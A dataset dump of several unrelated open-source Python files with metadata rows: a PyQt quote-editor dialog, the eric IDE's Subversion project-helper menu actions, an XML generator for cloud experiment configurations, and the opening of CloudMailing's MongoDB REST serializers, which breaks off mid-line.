self.gridLayout.addWidget(self.editDate, 5, 1, 1, 1)
self.editTags = QtWidgets.QLineEdit(Editor)
self.editTags.setObjectName("editTags")
self.gridLayout.addWidget(self.editTags, 6, 1, 1, 1)
self.label_3 = QtWidgets.QLabel(Editor)
self.label_3.setObjectName("label_3")
self.gridLayout.addWidget(self.label_3, 2, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.label_4 = QtWidgets.QLabel(Editor)
self.label_4.setObjectName("label_4")
self.gridLayout.addWidget(self.label_4, 3, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.label_5 = QtWidgets.QLabel(Editor)
self.label_5.setObjectName("label_5")
self.gridLayout.addWidget(self.label_5, 4, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.label_6 = QtWidgets.QLabel(Editor)
self.label_6.setObjectName("label_6")
self.gridLayout.addWidget(self.label_6, 5, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.label_7 = QtWidgets.QLabel(Editor)
self.label_7.setObjectName("label_7")
self.gridLayout.addWidget(self.label_7, 6, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.retranslateUi(Editor)
QtCore.QMetaObject.connectSlotsByName(Editor)
def retranslateUi(self, Editor):
_translate = QtCore.QCoreApplication.translate
Editor.setWindowTitle(_translate("Editor", "QuoteEdit"))
self.label.setText(_translate("Editor", "Quote"))
self.btnSave.setText(_translate("Editor", "Save"))
self.btnCancel.setText(_translate("Editor", "Cancel"))
self.label_2.setText(_translate("Editor", "Title"))
self.label_3.setText(_translate("Editor", "Category"))
self.label_4.setText(_translate("Editor", "Author"))
self.label_5.setText(_translate("Editor", "Characters"))
self.label_6.setText(_translate("Editor", "Date"))
self.label_7.setText(_translate("Editor", "Tags"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Editor = QtWidgets.QDialog()
ui = Ui_Editor()
ui.setupUi(Editor)
Editor.show()
sys.exit(app.exec_())
| gpl-3.0 | 1,446,403,713,159,849,200 | 47.37 | 114 | 0.674385 | false |
paulmadore/Eric-IDE | 6-6.0.9/eric/Plugins/VcsPlugins/vcsPySvn/ProjectHelper.py | 1 | 24920 | # -*- coding: utf-8 -*-
# Copyright (c) 2005 - 2015 Detlev Offenbach <[email protected]>
#
"""
Module implementing the VCS project helper for Subversion.
"""
from __future__ import unicode_literals
import os
from E5Gui.E5Application import e5App
from VCS.ProjectHelper import VcsProjectHelper
from E5Gui.E5Action import E5Action
import UI.PixmapCache
class SvnProjectHelper(VcsProjectHelper):
"""
Class implementing the VCS project helper for Subversion.
"""
def __init__(self, vcsObject, projectObject, parent=None, name=None):
"""
Constructor
@param vcsObject reference to the vcs object
@param projectObject reference to the project object
@param parent parent widget (QWidget)
@param name name of this object (string)
"""
VcsProjectHelper.__init__(self, vcsObject, projectObject, parent, name)
def getActions(self):
"""
Public method to get a list of all actions.
@return list of all actions (list of E5Action)
"""
return self.actions[:]
def initActions(self):
"""
Public method to generate the action objects.
"""
self.vcsNewAct = E5Action(
self.tr('New from repository'),
UI.PixmapCache.getIcon("vcsCheckout.png"),
self.tr('&New from repository...'), 0, 0, self,
'subversion_new')
self.vcsNewAct.setStatusTip(self.tr(
'Create a new project from the VCS repository'
))
self.vcsNewAct.setWhatsThis(self.tr(
"""<b>New from repository</b>"""
"""<p>This creates a new local project from the VCS"""
""" repository.</p>"""
))
self.vcsNewAct.triggered.connect(self._vcsCheckout)
self.actions.append(self.vcsNewAct)
self.vcsUpdateAct = E5Action(
self.tr('Update from repository'),
UI.PixmapCache.getIcon("vcsUpdate.png"),
self.tr('&Update from repository'), 0, 0, self,
'subversion_update')
self.vcsUpdateAct.setStatusTip(self.tr(
'Update the local project from the VCS repository'
))
self.vcsUpdateAct.setWhatsThis(self.tr(
"""<b>Update from repository</b>"""
"""<p>This updates the local project from the VCS"""
""" repository.</p>"""
))
self.vcsUpdateAct.triggered.connect(self._vcsUpdate)
self.actions.append(self.vcsUpdateAct)
self.vcsCommitAct = E5Action(
self.tr('Commit changes to repository'),
UI.PixmapCache.getIcon("vcsCommit.png"),
self.tr('&Commit changes to repository...'), 0, 0, self,
'subversion_commit')
self.vcsCommitAct.setStatusTip(self.tr(
'Commit changes to the local project to the VCS repository'
))
self.vcsCommitAct.setWhatsThis(self.tr(
"""<b>Commit changes to repository</b>"""
"""<p>This commits changes to the local project to the VCS"""
""" repository.</p>"""
))
self.vcsCommitAct.triggered.connect(self._vcsCommit)
self.actions.append(self.vcsCommitAct)
self.vcsLogAct = E5Action(
self.tr('Show log'),
UI.PixmapCache.getIcon("vcsLog.png"),
self.tr('Show &log'),
0, 0, self, 'subversion_log')
self.vcsLogAct.setStatusTip(self.tr(
'Show the log of the local project'
))
self.vcsLogAct.setWhatsThis(self.tr(
"""<b>Show log</b>"""
"""<p>This shows the log of the local project.</p>"""
))
self.vcsLogAct.triggered.connect(self._vcsLog)
self.actions.append(self.vcsLogAct)
self.svnLogBrowserAct = E5Action(
self.tr('Show log browser'),
UI.PixmapCache.getIcon("vcsLog.png"),
self.tr('Show log browser'),
0, 0, self, 'subversion_log_browser')
self.svnLogBrowserAct.setStatusTip(self.tr(
'Show a dialog to browse the log of the local project'
))
self.svnLogBrowserAct.setWhatsThis(self.tr(
"""<b>Show log browser</b>"""
"""<p>This shows a dialog to browse the log of the local"""
""" project. A limited number of entries is shown first. More"""
""" can be retrieved later on.</p>"""
))
self.svnLogBrowserAct.triggered.connect(self._vcsLogBrowser)
self.actions.append(self.svnLogBrowserAct)
self.vcsDiffAct = E5Action(
self.tr('Show differences'),
UI.PixmapCache.getIcon("vcsDiff.png"),
self.tr('Show &difference'),
0, 0, self, 'subversion_diff')
self.vcsDiffAct.setStatusTip(self.tr(
'Show the difference of the local project to the repository'
))
self.vcsDiffAct.setWhatsThis(self.tr(
"""<b>Show differences</b>"""
"""<p>This shows differences of the local project to the"""
""" repository.</p>"""
))
self.vcsDiffAct.triggered.connect(self._vcsDiff)
self.actions.append(self.vcsDiffAct)
self.svnExtDiffAct = E5Action(
self.tr('Show differences (extended)'),
UI.PixmapCache.getIcon("vcsDiff.png"),
self.tr('Show differences (extended)'),
0, 0, self, 'subversion_extendeddiff')
self.svnExtDiffAct.setStatusTip(self.tr(
'Show the difference of revisions of the project to the repository'
))
self.svnExtDiffAct.setWhatsThis(self.tr(
"""<b>Show differences (extended)</b>"""
"""<p>This shows differences of selectable revisions of"""
""" the project.</p>"""
))
self.svnExtDiffAct.triggered.connect(self.__svnExtendedDiff)
self.actions.append(self.svnExtDiffAct)
self.svnUrlDiffAct = E5Action(
self.tr('Show differences (URLs)'),
UI.PixmapCache.getIcon("vcsDiff.png"),
self.tr('Show differences (URLs)'),
0, 0, self, 'subversion_urldiff')
self.svnUrlDiffAct.setStatusTip(self.tr(
'Show the difference of the project between two repository URLs'
))
self.svnUrlDiffAct.setWhatsThis(self.tr(
"""<b>Show differences (URLs)</b>"""
"""<p>This shows differences of the project between"""
""" two repository URLs.</p>"""
))
self.svnUrlDiffAct.triggered.connect(self.__svnUrlDiff)
self.actions.append(self.svnUrlDiffAct)
self.vcsStatusAct = E5Action(
self.tr('Show status'),
UI.PixmapCache.getIcon("vcsStatus.png"),
self.tr('Show &status'),
0, 0, self, 'subversion_status')
self.vcsStatusAct.setStatusTip(self.tr(
'Show the status of the local project'
))
self.vcsStatusAct.setWhatsThis(self.tr(
"""<b>Show status</b>"""
"""<p>This shows the status of the local project.</p>"""
))
self.vcsStatusAct.triggered.connect(self._vcsStatus)
self.actions.append(self.vcsStatusAct)
self.svnChangeListsAct = E5Action(
self.tr('Show change lists'),
UI.PixmapCache.getIcon("vcsChangeLists.png"),
self.tr('Show change lists'),
0, 0, self, 'subversion_changelists')
self.svnChangeListsAct.setStatusTip(self.tr(
'Show the change lists and associated files of the local project'
))
self.svnChangeListsAct.setWhatsThis(self.tr(
"""<b>Show change lists</b>"""
"""<p>This shows the change lists and associated files of the"""
""" local project.</p>"""
))
self.svnChangeListsAct.triggered.connect(self.__svnChangeLists)
self.actions.append(self.svnChangeListsAct)
self.svnRepoInfoAct = E5Action(
self.tr('Show repository info'),
UI.PixmapCache.getIcon("vcsRepo.png"),
self.tr('Show repository info'),
0, 0, self, 'subversion_repoinfo')
self.svnRepoInfoAct.setStatusTip(self.tr(
'Show some repository related information for the local project'
))
self.svnRepoInfoAct.setWhatsThis(self.tr(
"""<b>Show repository info</b>"""
"""<p>This shows some repository related information for"""
""" the local project.</p>"""
))
self.svnRepoInfoAct.triggered.connect(self.__svnInfo)
self.actions.append(self.svnRepoInfoAct)
self.vcsTagAct = E5Action(
self.tr('Tag in repository'),
UI.PixmapCache.getIcon("vcsTag.png"),
self.tr('&Tag in repository...'),
0, 0, self, 'subversion_tag')
self.vcsTagAct.setStatusTip(self.tr(
'Tag the local project in the repository'
))
self.vcsTagAct.setWhatsThis(self.tr(
"""<b>Tag in repository</b>"""
"""<p>This tags the local project in the repository.</p>"""
))
self.vcsTagAct.triggered.connect(self._vcsTag)
self.actions.append(self.vcsTagAct)
self.vcsExportAct = E5Action(
self.tr('Export from repository'),
UI.PixmapCache.getIcon("vcsExport.png"),
self.tr('&Export from repository...'),
0, 0, self, 'subversion_export')
self.vcsExportAct.setStatusTip(self.tr(
'Export a project from the repository'
))
self.vcsExportAct.setWhatsThis(self.tr(
"""<b>Export from repository</b>"""
"""<p>This exports a project from the repository.</p>"""
))
self.vcsExportAct.triggered.connect(self._vcsExport)
self.actions.append(self.vcsExportAct)
self.vcsPropsAct = E5Action(
self.tr('Command options'),
self.tr('Command &options...'), 0, 0, self,
'subversion_options')
self.vcsPropsAct.setStatusTip(self.tr(
'Show the VCS command options'))
self.vcsPropsAct.setWhatsThis(self.tr(
"""<b>Command options...</b>"""
"""<p>This shows a dialog to edit the VCS command options.</p>"""
))
self.vcsPropsAct.triggered.connect(self._vcsCommandOptions)
self.actions.append(self.vcsPropsAct)
self.vcsRevertAct = E5Action(
self.tr('Revert changes'),
UI.PixmapCache.getIcon("vcsRevert.png"),
self.tr('Re&vert changes'),
0, 0, self, 'subversion_revert')
self.vcsRevertAct.setStatusTip(self.tr(
'Revert all changes made to the local project'
))
self.vcsRevertAct.setWhatsThis(self.tr(
"""<b>Revert changes</b>"""
"""<p>This reverts all changes made to the local project.</p>"""
))
self.vcsRevertAct.triggered.connect(self._vcsRevert)
self.actions.append(self.vcsRevertAct)
self.vcsMergeAct = E5Action(
self.tr('Merge'),
UI.PixmapCache.getIcon("vcsMerge.png"),
self.tr('Mer&ge changes...'),
0, 0, self, 'subversion_merge')
self.vcsMergeAct.setStatusTip(self.tr(
'Merge changes of a tag/revision into the local project'
))
self.vcsMergeAct.setWhatsThis(self.tr(
"""<b>Merge</b>"""
"""<p>This merges changes of a tag/revision into the local"""
""" project.</p>"""
))
self.vcsMergeAct.triggered.connect(self._vcsMerge)
self.actions.append(self.vcsMergeAct)
self.vcsSwitchAct = E5Action(
self.tr('Switch'),
UI.PixmapCache.getIcon("vcsSwitch.png"),
self.tr('S&witch...'),
0, 0, self, 'subversion_switch')
self.vcsSwitchAct.setStatusTip(self.tr(
'Switch the local copy to another tag/branch'
))
self.vcsSwitchAct.setWhatsThis(self.tr(
"""<b>Switch</b>"""
"""<p>This switches the local copy to another tag/branch.</p>"""
))
self.vcsSwitchAct.triggered.connect(self._vcsSwitch)
self.actions.append(self.vcsSwitchAct)
self.vcsResolveAct = E5Action(
self.tr('Conflicts resolved'),
self.tr('Con&flicts resolved'),
0, 0, self, 'subversion_resolve')
self.vcsResolveAct.setStatusTip(self.tr(
'Mark all conflicts of the local project as resolved'
))
self.vcsResolveAct.setWhatsThis(self.tr(
"""<b>Conflicts resolved</b>"""
"""<p>This marks all conflicts of the local project as"""
""" resolved.</p>"""
))
self.vcsResolveAct.triggered.connect(self.__svnResolve)
self.actions.append(self.vcsResolveAct)
self.vcsCleanupAct = E5Action(
self.tr('Cleanup'),
self.tr('Cleanu&p'),
0, 0, self, 'subversion_cleanup')
self.vcsCleanupAct.setStatusTip(self.tr(
'Cleanup the local project'
))
self.vcsCleanupAct.setWhatsThis(self.tr(
"""<b>Cleanup</b>"""
"""<p>This performs a cleanup of the local project.</p>"""
))
self.vcsCleanupAct.triggered.connect(self._vcsCleanup)
self.actions.append(self.vcsCleanupAct)
self.vcsCommandAct = E5Action(
self.tr('Execute command'),
self.tr('E&xecute command...'),
0, 0, self, 'subversion_command')
self.vcsCommandAct.setStatusTip(self.tr(
'Execute an arbitrary VCS command'
))
self.vcsCommandAct.setWhatsThis(self.tr(
"""<b>Execute command</b>"""
"""<p>This opens a dialog to enter an arbitrary VCS command.</p>"""
))
self.vcsCommandAct.triggered.connect(self._vcsCommand)
self.actions.append(self.vcsCommandAct)
self.svnTagListAct = E5Action(
self.tr('List tags'),
self.tr('List tags...'),
0, 0, self, 'subversion_list_tags')
self.svnTagListAct.setStatusTip(self.tr(
'List tags of the project'
))
self.svnTagListAct.setWhatsThis(self.tr(
"""<b>List tags</b>"""
"""<p>This lists the tags of the project.</p>"""
))
self.svnTagListAct.triggered.connect(self.__svnTagList)
self.actions.append(self.svnTagListAct)
self.svnBranchListAct = E5Action(
self.tr('List branches'),
self.tr('List branches...'),
0, 0, self, 'subversion_list_branches')
self.svnBranchListAct.setStatusTip(self.tr(
'List branches of the project'
))
self.svnBranchListAct.setWhatsThis(self.tr(
"""<b>List branches</b>"""
"""<p>This lists the branches of the project.</p>"""
))
self.svnBranchListAct.triggered.connect(self.__svnBranchList)
self.actions.append(self.svnBranchListAct)
self.svnListAct = E5Action(
self.tr('List repository contents'),
self.tr('List repository contents...'),
0, 0, self, 'subversion_contents')
self.svnListAct.setStatusTip(self.tr(
'Lists the contents of the repository'
))
self.svnListAct.setWhatsThis(self.tr(
"""<b>List repository contents</b>"""
"""<p>This lists the contents of the repository.</p>"""
))
self.svnListAct.triggered.connect(self.__svnTagList)
self.actions.append(self.svnListAct)
self.svnPropSetAct = E5Action(
self.tr('Set Property'),
self.tr('Set Property...'),
0, 0, self, 'subversion_property_set')
self.svnPropSetAct.setStatusTip(self.tr(
'Set a property for the project files'
))
self.svnPropSetAct.setWhatsThis(self.tr(
"""<b>Set Property</b>"""
"""<p>This sets a property for the project files.</p>"""
))
self.svnPropSetAct.triggered.connect(self.__svnPropSet)
self.actions.append(self.svnPropSetAct)
self.svnPropListAct = E5Action(
self.tr('List Properties'),
self.tr('List Properties...'),
0, 0, self, 'subversion_property_list')
self.svnPropListAct.setStatusTip(self.tr(
'List properties of the project files'
))
self.svnPropListAct.setWhatsThis(self.tr(
"""<b>List Properties</b>"""
"""<p>This lists the properties of the project files.</p>"""
))
self.svnPropListAct.triggered.connect(self.__svnPropList)
self.actions.append(self.svnPropListAct)
self.svnPropDelAct = E5Action(
self.tr('Delete Property'),
self.tr('Delete Property...'),
0, 0, self, 'subversion_property_delete')
self.svnPropDelAct.setStatusTip(self.tr(
'Delete a property for the project files'
))
self.svnPropDelAct.setWhatsThis(self.tr(
"""<b>Delete Property</b>"""
"""<p>This deletes a property for the project files.</p>"""
))
self.svnPropDelAct.triggered.connect(self.__svnPropDel)
self.actions.append(self.svnPropDelAct)
self.svnRelocateAct = E5Action(
self.tr('Relocate'),
UI.PixmapCache.getIcon("vcsSwitch.png"),
self.tr('Relocate...'),
0, 0, self, 'subversion_relocate')
self.svnRelocateAct.setStatusTip(self.tr(
'Relocate the working copy to a new repository URL'
))
self.svnRelocateAct.setWhatsThis(self.tr(
"""<b>Relocate</b>"""
"""<p>This relocates the working copy to a new repository"""
""" URL.</p>"""
))
self.svnRelocateAct.triggered.connect(self.__svnRelocate)
self.actions.append(self.svnRelocateAct)
self.svnRepoBrowserAct = E5Action(
self.tr('Repository Browser'),
UI.PixmapCache.getIcon("vcsRepoBrowser.png"),
self.tr('Repository Browser...'),
0, 0, self, 'subversion_repo_browser')
self.svnRepoBrowserAct.setStatusTip(self.tr(
'Show the Repository Browser dialog'
))
self.svnRepoBrowserAct.setWhatsThis(self.tr(
"""<b>Repository Browser</b>"""
"""<p>This shows the Repository Browser dialog.</p>"""
))
self.svnRepoBrowserAct.triggered.connect(self.__svnRepoBrowser)
self.actions.append(self.svnRepoBrowserAct)
self.svnConfigAct = E5Action(
self.tr('Configure'),
self.tr('Configure...'),
0, 0, self, 'subversion_configure')
self.svnConfigAct.setStatusTip(self.tr(
'Show the configuration dialog with the Subversion page selected'
))
self.svnConfigAct.setWhatsThis(self.tr(
"""<b>Configure</b>"""
"""<p>Show the configuration dialog with the Subversion page"""
""" selected.</p>"""
))
self.svnConfigAct.triggered.connect(self.__svnConfigure)
self.actions.append(self.svnConfigAct)
self.svnUpgradeAct = E5Action(
self.tr('Upgrade'),
self.tr('Upgrade...'),
0, 0, self, 'subversion_upgrade')
self.svnUpgradeAct.setStatusTip(self.tr(
'Upgrade the working copy to the current format'
))
self.svnUpgradeAct.setWhatsThis(self.tr(
"""<b>Upgrade</b>"""
"""<p>Upgrades the working copy to the current format.</p>"""
))
self.svnUpgradeAct.triggered.connect(self.__svnUpgrade)
self.actions.append(self.svnUpgradeAct)
def initMenu(self, menu):
"""
Public method to generate the VCS menu.
@param menu reference to the menu to be populated (QMenu)
"""
menu.clear()
act = menu.addAction(
UI.PixmapCache.getIcon(
os.path.join("VcsPlugins", "vcsPySvn", "icons", "pysvn.png")),
self.vcs.vcsName(), self._vcsInfoDisplay)
font = act.font()
font.setBold(True)
act.setFont(font)
menu.addSeparator()
menu.addAction(self.vcsUpdateAct)
menu.addAction(self.vcsCommitAct)
menu.addSeparator()
menu.addAction(self.vcsNewAct)
menu.addAction(self.vcsExportAct)
menu.addSeparator()
menu.addAction(self.vcsTagAct)
if self.vcs.otherData["standardLayout"]:
menu.addAction(self.svnTagListAct)
menu.addAction(self.svnBranchListAct)
else:
menu.addAction(self.svnListAct)
menu.addSeparator()
menu.addAction(self.vcsLogAct)
menu.addAction(self.svnLogBrowserAct)
menu.addSeparator()
menu.addAction(self.vcsStatusAct)
menu.addAction(self.svnChangeListsAct)
menu.addAction(self.svnRepoInfoAct)
menu.addSeparator()
menu.addAction(self.vcsDiffAct)
menu.addAction(self.svnExtDiffAct)
menu.addAction(self.svnUrlDiffAct)
menu.addSeparator()
menu.addAction(self.vcsRevertAct)
menu.addAction(self.vcsMergeAct)
menu.addAction(self.vcsResolveAct)
menu.addSeparator()
menu.addAction(self.vcsSwitchAct)
menu.addAction(self.svnRelocateAct)
menu.addSeparator()
menu.addAction(self.svnPropSetAct)
menu.addAction(self.svnPropListAct)
menu.addAction(self.svnPropDelAct)
menu.addSeparator()
menu.addAction(self.vcsCleanupAct)
menu.addSeparator()
menu.addAction(self.vcsCommandAct)
menu.addAction(self.svnRepoBrowserAct)
menu.addAction(self.svnUpgradeAct)
menu.addSeparator()
menu.addAction(self.vcsPropsAct)
menu.addSeparator()
menu.addAction(self.svnConfigAct)
def __svnResolve(self):
"""
Private slot used to resolve conflicts of the local project.
"""
self.vcs.svnResolve(self.project.ppath)
def __svnPropList(self):
"""
Private slot used to list the properties of the project files.
"""
self.vcs.svnListProps(self.project.ppath, True)
def __svnPropSet(self):
"""
Private slot used to set a property for the project files.
"""
self.vcs.svnSetProp(self.project.ppath, True)
def __svnPropDel(self):
"""
Private slot used to delete a property for the project files.
"""
self.vcs.svnDelProp(self.project.ppath, True)
def __svnTagList(self):
"""
Private slot used to list the tags of the project.
"""
self.vcs.svnListTagBranch(self.project.ppath, True)
def __svnBranchList(self):
"""
Private slot used to list the branches of the project.
"""
self.vcs.svnListTagBranch(self.project.ppath, False)
def __svnExtendedDiff(self):
"""
Private slot used to perform a svn diff with the selection of
revisions.
"""
self.vcs.svnExtendedDiff(self.project.ppath)
def __svnUrlDiff(self):
"""
Private slot used to perform a svn diff with the selection of
repository URLs.
"""
self.vcs.svnUrlDiff(self.project.ppath)
def __svnInfo(self):
"""
Private slot used to show repository information for the local project.
"""
self.vcs.svnInfo(self.project.ppath, ".")
def __svnRelocate(self):
"""
Private slot used to relocate the working copy to a new repository URL.
"""
self.vcs.svnRelocate(self.project.ppath)
def __svnRepoBrowser(self):
"""
Private slot to open the repository browser.
"""
self.vcs.svnRepoBrowser(projectPath=self.project.ppath)
def __svnConfigure(self):
"""
Private slot to open the configuration dialog.
"""
e5App().getObject("UserInterface")\
.showPreferences("zzz_subversionPage")
def __svnChangeLists(self):
"""
Private slot used to show a list of change lists.
"""
self.vcs.svnShowChangelists(self.project.ppath)
def __svnUpgrade(self):
"""
Private slot used to upgrade the working copy format.
"""
self.vcs.svnUpgrade(self.project.ppath)
| gpl-3.0 | 8,645,574,378,206,538,000 | 37.45679 | 79 | 0.577127 | false |
lpouillo/execo-g5k-tools | engines/simgrid_paasage/xml_gen_execo.py | 1 | 5079 | import xml.etree.cElementTree as ET # that 'c' in "...etree.cElement..."
# means the package is a C implementation; it runs 15-20 times faster
# than equivalent python implementation
import xml.dom.minidom as DOM
import shutil
import lxml.etree as le
import re
import itertools
from optparse import OptionParser
def initXML():
root = ET.Element("nTierApplication")
root.set("version", "1")
ami = ET.SubElement(root, "AMI")
field1 = ET.SubElement(ami, "webService")
field1.set("size", "10000000000.0")
field2 = ET.SubElement(ami, "appsService")
field2.set("size", "10000000000.0")
field3 = ET.SubElement(ami, "dbService")
field3.set("size", "10000000000.0")
field4 = ET.SubElement(ami, "webProxy")
field4.set("size", "10000000000.0")
field5 = ET.SubElement(ami, "appsProxy")
field5.set("size", "10000000000.0")
field6 = ET.SubElement(ami, "dbProxy")
field6.set("size", "10000000000.0")
proxy = ET.SubElement(root, "proxy")
field7 = ET.SubElement(proxy, "webProxy")
field7.set("region", "eu_1")
field7.set("instanceType","m1.small")
field8 = ET.SubElement(proxy, "appsProxy")
field8.set("region", "eu_1")
field8.set("instanceType","m1.small")
field9 = ET.SubElement(proxy, "dbProxy")
field9.set("region", "eu_1")
field9.set("instanceType","m1.small")
return root
def createService(parent, name):
tmp = ET.SubElement(parent, name)
return tmp
def createRegion(parent, name):
tmp = ET.SubElement(parent, "region")
tmp.set("name", name )
return tmp
def createInstance(parent, ty, qt):
tmp = ET.SubElement(parent, "instance")
tmp.set("quantity", qt )
tmp.set("type", ty )
return tmp
def generateExp(comb_str, lis, rootSrc):
root=initXML()
servParent=ET.SubElement(root, "services")
servWeb=createService(servParent,"webService")
servApp=createService(servParent,"appsService")
servDb=createService(servParent,"dbService")
i=0
web = rootSrc.find("webService")
if (web == None):
print "webService tag not found!"
exit(1)
for child1 in web.iter("region"):
regionTmp=createRegion(servWeb, child1.get("name"))
for child2 in child1.iter("instance"):
if (lis[child2.get("type")] != '0'):
createInstance(regionTmp, child2.get("type"), lis[child2.get("type")])
else:
continue
if not regionTmp.getchildren():
servWeb.remove(regionTmp)
if(not servWeb.getchildren()):
print "ERROR: Web service does not has any vm instance associated for first experiment"
exit(2)
app=rootSrc.find("appsService")
if (app==None):
print "ERROR: appsService tag not found!"
exit(1)
for child1 in app.iter("region"):
regionTmp=createRegion(servApp, child1.get("name"))
for child2 in child1.iter("instance"):
if (lis[child2.get("type")] != '0'):
createInstance(regionTmp, child2.get("type"), lis[child2.get("type")])
else:
continue
if not regionTmp.getchildren():
servApp.remove(regionTmp)
if(not servApp.getchildren()):
print "ERROR: Apps Service does not has any vm instance associated for first experiment"
exit(2)
db=rootSrc.find("dbService")
if (db==None):
print "ERROR: dbService tag not found!"
exit(1)
for child1 in db.iter("region"):
regionTmp=createRegion(servDb, child1.get("name"))
for child2 in child1.iter("instance"):
if (lis[child2.get("type")] != '0'):
createInstance(regionTmp, child2.get("type"), lis[child2.get("type")])
else:
continue
if not regionTmp.getchildren():
servDb.remove(regionTmp)
if(not servDb.getchildren()):
print "ERROR: Db service does not has any vm instance associated for first experiment"
exit(2)
xml_string=ET.tostring(root, encoding='utf8', method='xml')
xml = DOM.parseString(xml_string)
pretty_xml_as_string = xml.toprettyxml()
outFile=open("exp_"+comb_str+".xml", "w")
outFile.write(pretty_xml_as_string)
def create_dict(comb_list):
res_dict=dict()
length=len(comb_list)-1
for i in drange(0,length,2):
res_dict[comb_list[i]]=comb_list[i+1]
return res_dict
def drange(start, stop, step):
r = start
while r < stop:
yield r
r += step
if __name__ == "__main__":
tree = ET.parse("conf.xml")
rootSrc = tree.getroot()
usage = "usage: %prog [options] [args] "
parser = OptionParser(usage=usage)
parser.add_option("--cb", dest="comb", help="current combination")
(options, args) = parser.parse_args()
if not (options.comb):
parser.error("You must provide parameters for the experiment !")
param_dict=create_dict(options.comb.split("_"))
generateExp(options.comb, param_dict, rootSrc)
| gpl-3.0 | -9,222,059,549,375,971,000 | 28.52907 | 100 | 0.617051 | false |
ricard33/cloud-mailing | cloud_mailing/master/serializers.py | 1 | 11463 | # Copyright 2015-2019 Cedric RICARD
#
# This file is part of CloudMailing.
#
# CloudMailing is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# CloudMailing is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with CloudMailing. If not, see <http://www.gnu.org/licenses/>.
import email
import email.parser
import email.policy
import logging
import re
from datetime import timedelta, datetime
import dateutil.parser
import txmongo.filter
from twisted.internet import defer
from ..common.encoding import force_text
from .api_common import compute_hourly_stats
from ..common.db_common import get_db
from . import models
from ..common import settings
from ..common.rest_api_common import NotFound
__author__ = 'Cedric RICARD'
log = logging.getLogger('api')
class Serializer(object):
"""
Base class to serialize/unserialize objects to/from json or XMLRPC `struct` format
"""
fields = []
model_class = None
id_field = '_id'
def __init__(self, instance=None, data=None, fields_filter=None, many=False):
self._collection = self.model_class and get_db()[self.model_class._get_name()] or None
self._instance = instance
self._data = data
self._fields_filter = fields_filter or []
if fields_filter == 'total':
self._fields_filter = ['.total']
elif fields_filter == 'none':
self._fields_filter = []
elif fields_filter == 'default_with_total':
self._fields_filter = self.fields + ('.total',)
elif fields_filter == 'default' or fields_filter is None:
self._fields_filter = self.fields
# elif not isinstance(fields_filter, (list, tuple)):
# raise ValueError("Bad value for 'fields_filter' (was '%s')" % fields_filter)
else:
self._fields_filter = fields_filter or []
self._many = many
@property
def filtered_fields(self):
return list(set(self.fields) & set(self._fields_filter))
def make_filter(self, args):
_filter = {}
for field, value in list(args.items()):
if isinstance(value, (list, tuple)):
_filter[field] = {'$in': value}
elif isinstance(value, str):
_filter[field] = {'$regex': '.*' + re.escape(value) + '.*'}
else:
_filter[field] = value
return _filter
def make_get_filter(self, object_id):
"""
Compose the filter used to retrieve an object by its id.
Defaults to using `{_id: object_id}`.
You may want to override this if you need to provide different logic.
"""
return {self.id_field: object_id}
@defer.inlineCallbacks
def get(self, id):
try:
obj = yield self._collection.find_one(self.make_get_filter(id), fields=self.filtered_fields)
if obj:
obj['id'] = obj.pop('_id')
if 'subject' not in obj and 'subject' in self.filtered_fields and 'header' in obj:
parser = email.parser.BytesHeaderParser(policy=email.policy.default)
msg = parser.parsebytes(obj['header'])
obj['subject'] = msg.get('Subject')
defer.returnValue(obj)
raise NotFound
except IndexError:
raise NotFound
except defer._DefGen_Return:
raise
except:
log.exception("Error in Serializer.get()")
raise
@staticmethod
def make_tx_sort_filter(sort):
if sort is None:
return None
if isinstance(sort, str):
return txmongo.filter.sort(txmongo.filter.ASCENDING(sort))
def _get_direction(value):
if value > 0:
return txmongo.filter.ASCENDING
return txmongo.filter.DESCENDING
assert(isinstance(sort, (list, tuple)))
if len(sort) == 2 and isinstance(sort[0], str):
return txmongo.filter.sort(_get_direction(sort[1](sort[0])))
return txmongo.filter.sort(sort)
@defer.inlineCallbacks
def find(self, spec, skip=0, limit=settings.PAGE_SIZE, sort=None):
_filter = self.make_filter(spec)
# log.debug("find() filter: %s", _filter)
results = yield self._collection.find(_filter, fields=self.filtered_fields, skip=skip, limit=limit,
filter=self.make_tx_sort_filter(sort))
items = []
for obj in results:
if '_id' in obj:
obj['id'] = obj.pop('_id')
items.append(obj)
response = {
'items': items
}
if '.total' in self._fields_filter:
response['total'] = yield self._collection.count(_filter)
defer.returnValue(response)
class UserSerializer(Serializer):
model_class = models.User
fields = (
'_id', 'username', 'is_superuser', 'groups'
)
class MailingSerializer(Serializer):
"""
Mailing serializer
"""
model_class = models.Mailing
fields = (
'_id', 'domain_name', 'satellite_group', 'owner_guid',
'mail_from', 'sender_name', 'subject', 'status',
'type', 'tracking_url', 'dkim',
'header',
'dont_close_if_empty',
'submit_time', 'scheduled_start', 'scheduled_end', 'scheduled_duration',
'start_time', 'end_time',
'total_recipient', 'total_sent', 'total_pending', 'total_error',
'total_softbounce',
'read_tracking', 'click_tracking', 'mailing', 'url_encoding',
)
def make_filter(self, args):
mailings_filter = {}
if args:
available_filters = ('domain', 'id', 'status', 'owner_guid', 'satellite_group')
for key in list(args.keys()):
if key not in available_filters:
log.error("Bad filter name '%s'. Available filters are: %s", key, ', '.join(available_filters))
raise ValueError("Bad filter name '%s'. Available filters are: %s" % (key, ', '.join(available_filters)))
if 'domain' in args:
domain = args['domain']
if isinstance(domain, str):
mailings_filter['domain_name'] = domain
else:
mailings_filter['domain_name'] = {'$in': domain}
if 'id' in args:
value = args['id']
ids_list = isinstance(value, (list, tuple)) and value or [value]
mailings_filter['_id'] = {'$in': ids_list}
if 'status' in args:
value = args['status']
status_list = isinstance(value, (list, tuple)) and value or [value]
for status in status_list:
available_status = models.relay_status
status = force_text(status)
if status not in available_status:
log.error("Bad status '%s'. Available status are: %s",
status, ', '.join(available_status))
raise ValueError("Bad status '%s'. Available status are: %s"
